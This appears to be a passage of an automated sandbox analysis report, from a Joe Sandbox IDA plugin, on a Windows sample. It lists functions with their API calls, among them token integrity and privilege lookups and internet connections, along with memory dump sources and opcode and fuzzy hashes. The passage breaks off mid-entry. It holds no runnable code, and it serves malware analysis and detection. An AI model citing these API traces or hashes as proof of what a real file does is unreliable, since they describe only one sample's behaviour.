                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: 7460a1ee99bbe71c7553264c2c60d430709fb1594c00c694852d20469d63e964
                                                                                                                    • Instruction ID: 8ec8112014e3bbe0bd2014f85773061e82a27f69f04dba8dc9e02c93d8b62f70
                                                                                                                    • Opcode Fuzzy Hash: 7460a1ee99bbe71c7553264c2c60d430709fb1594c00c694852d20469d63e964
                                                                                                                    • Instruction Fuzzy Hash: BC31D235610018FFDB27CF59C898EEA7BB9EB0A310F444069F9099B262C731AD50DFA4
                                                                                                                    Function 00308656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00308121
                                                                                                                      • Part of subcall function 0030810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0030812B
                                                                                                                      • Part of subcall function 0030810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0030813A
                                                                                                                      • Part of subcall function 0030810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00308141
                                                                                                                      • Part of subcall function 0030810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00308157
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003086A3
                                                                                                                    • _memcmp.LIBCMT ref: 003086C6
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003086FC
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00308703
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1592001646-0
                                                                                                                    • Opcode ID: 7198e9b93c4fd1fa25005e7b1533269e6e8bec2e8dc17c5f4e81bb6e792f9e2b
                                                                                                                    • Instruction ID: 1fc14a23aa3318502a1c8e4cc9458bdba6ce5bd61ea8ee81b1e4de9e25bf2106
                                                                                                                    • Opcode Fuzzy Hash: 7198e9b93c4fd1fa25005e7b1533269e6e8bec2e8dc17c5f4e81bb6e792f9e2b
                                                                                                                    • Instruction Fuzzy Hash: 1E219D71E02208EFDB11DFA8C959BEEB7B8EF44304F164059E585AB281DB31AE05CB90
                                                                                                                    Function 002D098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __setmode.LIBCMT ref: 002D09AE
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317896,?,?,00000000), ref: 002B5A2C
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317896,?,?,00000000,?,?), ref: 002B5A50
                                                                                                                    • _fprintf.LIBCMT ref: 002D09E5
                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00305DBB
                                                                                                                      • Part of subcall function 002D4AAA: _flsall.LIBCMT ref: 002D4AC3
                                                                                                                    • __setmode.LIBCMT ref: 002D0A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 521402451-0
                                                                                                                    • Opcode ID: 51549757d7147b0cffe79732e9076aaa9d3a4dda307e4d722713122c80f9aff1
                                                                                                                    • Instruction ID: f898b27b674dac773b47e38779b6cac74792cec7efefb8f8b06f8b18b0629041
                                                                                                                    • Opcode Fuzzy Hash: 51549757d7147b0cffe79732e9076aaa9d3a4dda307e4d722713122c80f9aff1
                                                                                                                    • Instruction Fuzzy Hash: 601157319286046FC705B3B49C86AFE77AC9F45360F244027F205A72D2EE705CA25BE0
                                                                                                                    Function 00321767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003217A3
                                                                                                                      • Part of subcall function 0032182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0032184C
                                                                                                                      • Part of subcall function 0032182D: InternetCloseHandle.WININET(00000000), ref: 003218E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: 7d4077951efac8ae35954e05f10f9d04c2f7a26f641243a8aa48b2ab03023c7f
                                                                                                                    • Instruction ID: af1184c2b4deab23e8186793f4e44b2cb1e9c06281d3d674fbd168fa7669e9f3
                                                                                                                    • Opcode Fuzzy Hash: 7d4077951efac8ae35954e05f10f9d04c2f7a26f641243a8aa48b2ab03023c7f
                                                                                                                    • Instruction Fuzzy Hash: BB21C331600615BFEB139F64ED81FBBBBADFF98710F10412AFA119A650DB71D811A7A0
                                                                                                                    Function 00313A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,0033FAC0), ref: 00313A64
                                                                                                                    • GetLastError.KERNEL32 ref: 00313A73
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00313A82
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0033FAC0), ref: 00313ADF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: efded9bf31b390171a83bc9d82adb89e2fb6b468a6023c16a282aaf82e263f5e
                                                                                                                    • Instruction ID: adc99b46c7b4524642bf538b7001f2ef38a14718eb2e6269d56c8e94fef92af0
                                                                                                                    • Opcode Fuzzy Hash: efded9bf31b390171a83bc9d82adb89e2fb6b468a6023c16a282aaf82e263f5e
                                                                                                                    • Instruction Fuzzy Hash: B52186745082059F8715EF28C8818EB77E8EE59364F144A2DF4D9C72A1D731DE95CF82
                                                                                                                    Function 0030DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0030F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0030DCD3,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?), ref: 0030F0CB
                                                                                                                      • Part of subcall function 0030F0BC: lstrcpyW.KERNEL32(00000000,?,?,0030DCD3,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030F0F1
                                                                                                                      • Part of subcall function 0030F0BC: lstrcmpiW.KERNEL32(00000000,?,0030DCD3,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?), ref: 0030F122
                                                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030DCEC
                                                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030DD12
                                                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0030EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0030DD46
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    • Opcode ID: 5f0451df95a3390239e5c180b8b5dc3702e59c37fb395a586f357ee44e6a9347
                                                                                                                    • Instruction ID: 9b7d84bdf462dbcdc6a69e5093f62dbf70e7af3312b40643847d16c7b05a9890
                                                                                                                    • Opcode Fuzzy Hash: 5f0451df95a3390239e5c180b8b5dc3702e59c37fb395a586f357ee44e6a9347
                                                                                                                    • Instruction Fuzzy Hash: 2F11BE3A201305EFDB26AF74D895D7A77E9FF45310F80802AE806CB2A0EB719C50DB94
                                                                                                                    Function 002E50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 002E5101
                                                                                                                      • Part of subcall function 002D571C: __FF_MSGBANNER.LIBCMT ref: 002D5733
                                                                                                                      • Part of subcall function 002D571C: __NMSG_WRITE.LIBCMT ref: 002D573A
                                                                                                                      • Part of subcall function 002D571C: RtlAllocateHeap.NTDLL(00F60000,00000000,00000001,00000000,?,?,?,002D0DD3,?), ref: 002D575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: 485558fa34f47570ec434d44f6c67bd976ac9e26ba5e7830f54bd7e653f65ce7
                                                                                                                    • Instruction ID: 221d7203f30be872d065646e8e944e8139d0ee7e72d0db7dc5c06da1db8926c7
                                                                                                                    • Opcode Fuzzy Hash: 485558fa34f47570ec434d44f6c67bd976ac9e26ba5e7830f54bd7e653f65ce7
                                                                                                                    • Instruction Fuzzy Hash: 9911E372974A62AECB322F72EC45B5D37989F04369F50452BF94C9E250DE70CC609A90
                                                                                                                    Function 00326369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00317896,?,?,00000000), ref: 002B5A2C
                                                                                                                      • Part of subcall function 002B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00317896,?,?,00000000,?,?), ref: 002B5A50
                                                                                                                    • gethostbyname.WSOCK32(?,?,?), ref: 00326399
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003263A4
                                                                                                                    • _memmove.LIBCMT ref: 003263D1
                                                                                                                    • inet_ntoa.WSOCK32(?), ref: 003263DC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1504782959-0
                                                                                                                    • Opcode ID: e11fcfc821ab034fff4a0fbbfcfddaf7d4b041d1e746500b5a65ba98c82744c0
                                                                                                                    • Instruction ID: fae325297be1a983f0d8779c0f41897664807bacc26a7cdb358f843fa0217fe9
                                                                                                                    • Opcode Fuzzy Hash: e11fcfc821ab034fff4a0fbbfcfddaf7d4b041d1e746500b5a65ba98c82744c0
                                                                                                                    • Instruction Fuzzy Hash: 15116031910119AFCB05FBA4DD86DEEB7B8AF09310F544065F506AB261DB30AE24CFA1
                                                                                                                    Function 00308B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00308B61
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00308B73
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00308B89
                                                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00308BA4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 512fd97af26cd64dc2359f210e33c8184127ffedc99b3c81cf0f0b7e3c0821a5
                                                                                                                    • Instruction ID: 8e8a767d83856798657dad1c2498d7eff441d46aca43743e9a8718d1f3e5a34b
                                                                                                                    • Opcode Fuzzy Hash: 512fd97af26cd64dc2359f210e33c8184127ffedc99b3c81cf0f0b7e3c0821a5
                                                                                                                    • Instruction Fuzzy Hash: 1F112A79901218FFEB11DFA5CD85FADBBB8FB48710F2040A5EA40B7290DA716E11DB94
                                                                                                                    Function 002B1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B2612: GetWindowLongW.USER32(?,000000EB), ref: 002B2623
                                                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 002B12D8
                                                                                                                    • GetClientRect.USER32(?,?), ref: 002EB5FB
                                                                                                                    • GetCursorPos.USER32(?), ref: 002EB605
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 002EB610
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4127811313-0
                                                                                                                    • Opcode ID: e6613e580b45560cffa1eb3ca37d722ae0de4cfc4b23564d5fb00aa4595b51d6
                                                                                                                    • Instruction ID: f867da672d5cbeddf91c291459405f150e501d5992a3c9d759f02c4531c4801c
                                                                                                                    • Opcode Fuzzy Hash: e6613e580b45560cffa1eb3ca37d722ae0de4cfc4b23564d5fb00aa4595b51d6
                                                                                                                    • Instruction Fuzzy Hash: 39116A35A20029EFCB15DF98C899DEE77B8EB05341F800456F901E7150C730BA618BA5
                                                                                                                    Function 0030D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0030D84D
                                                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0030D864
                                                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0030D879
                                                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0030D897
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352324309-0
                                                                                                                    • Opcode ID: c9335401b1d5a9b8ddcda065098fd44756b4bd520afcc003b5f11b21282a2cf5
                                                                                                                    • Instruction ID: 3068293eded064baca4a728742f1e7808d1f29053d1c585e8bd28711da10de75
                                                                                                                    • Opcode Fuzzy Hash: c9335401b1d5a9b8ddcda065098fd44756b4bd520afcc003b5f11b21282a2cf5
                                                                                                                    • Instruction Fuzzy Hash: 4D11A171A02304DFE3218F91ED48F93BBFCEB00B00F50C569A516C6480D7B0E508DBA1
                                                                                                                    Function 002E6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3016257755-0
                                                                                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                    • Instruction ID: 37a55529ed351dbcb7bdba684db331082670829f6af3815022254d9d53c40712
                                                                                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                                                    • Instruction Fuzzy Hash: 88014C724A818ABBCF165F85CC05CEE3F66BB28395F988415FE1858031D236C9B1AF81
                                                                                                                    Function 0033B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0033B2E4
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0033B2FC
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0033B320
                                                                                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0033B33B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: 46caf079084bb1b90a9254bf24cc1b27d13f939db43747f7437fca2ab71580eb
                                                                                                                    • Instruction ID: b3a00bd11965d9a244281978a8a86b09e789b9385ae32c211eb8b464233f6e59
                                                                                                                    • Opcode Fuzzy Hash: 46caf079084bb1b90a9254bf24cc1b27d13f939db43747f7437fca2ab71580eb
                                                                                                                    • Instruction Fuzzy Hash: 951143B9D00609EFDB41CFA9C8859EEFBB9FB08310F508166E914E3220D735AA558F50
                                                                                                                    Function 00316BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00316BE6
                                                                                                                      • Part of subcall function 003176C4: _memset.LIBCMT ref: 003176F9
                                                                                                                    • _memmove.LIBCMT ref: 00316C09
                                                                                                                    • _memset.LIBCMT ref: 00316C16
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00316C26
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 48991266-0
                                                                                                                    • Opcode ID: 68d9d046eaace5241d4219e4ddec734d313abdbe7da63d9bab43a297efa3694b
